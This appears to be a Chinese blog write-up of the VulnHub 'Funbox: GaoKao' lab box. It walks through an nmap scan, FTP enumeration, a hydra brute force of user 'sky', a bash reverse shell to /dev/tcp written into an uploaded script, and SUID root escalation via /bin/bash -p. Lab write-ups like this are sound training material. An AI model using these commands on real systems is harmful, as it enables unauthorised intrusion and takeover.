VulnHub渗透测试实战靶场 - Funbox: GaoKao

VulnHub渗透测试实战靶场 - Funbox: GaoKao

  • 题目描述
  • 环境下载
  • Funbox: Lunchbreaker靶机搭建
  • 渗透测试
    • 信息搜集
    • 漏洞挖掘
    • getshell
    • 提权

题目描述

It's a box for beginners, but not easy. Gather careful !!!

Hint:

Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.

Enjoy the game and WYSIWYG !

This works better with VirtualBox rather than VMware

环境下载

  • 戳此进行环境下载

Funbox: Lunchbreaker靶机搭建

  • 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡
  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.117
  • 攻击机的 IP 地址为:192.168.56.102
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第1张图片

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.117,发现开放了 21、22、80、3306 四个端口

VulnHub渗透测试实战靶场 - Funbox: GaoKao_第2张图片

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.116

VulnHub渗透测试实战靶场 - Funbox: GaoKao_第3张图片

漏洞挖掘

  • web 页面没有什么发现,尝试匿名登录 ftp,提示用户 sky
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第4张图片
  • 利用 hydra 爆破 sky 用户的密码,得到密码为 thebest
hydra -l sky -P rockyou.txt 192.168.56.117 ssh
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第5张图片
  • 登录 ftp,发现存在一个文件 user.flag,下载到本地查看后发现可以改写内容来反弹 shell
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第6张图片 VulnHub渗透测试实战靶场 - Funbox: GaoKao_第7张图片
#!/bin/sh
bash -i >& /dev/tcp/192.168.56.102/1234 0>&1;
  • 将改写好的文件重新上传回去
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第8张图片

getshell

  • 开启 nc 监听,成功接收到反弹的 shell
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第9张图片

提权

  • 由于 sudo -l 命令不知道密码无法使用,执行命令 find / -perm -u=s -type f 2>/dev/null,查看可以利用啥来进行提权
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第10张图片
  • 利用 /bin/bash -p 来进行提权,成功拿到 root 权限
VulnHub渗透测试实战靶场 - Funbox: GaoKao_第11张图片

你可能感兴趣的:(linux,VulnHub,渗透测试,原力计划,安全)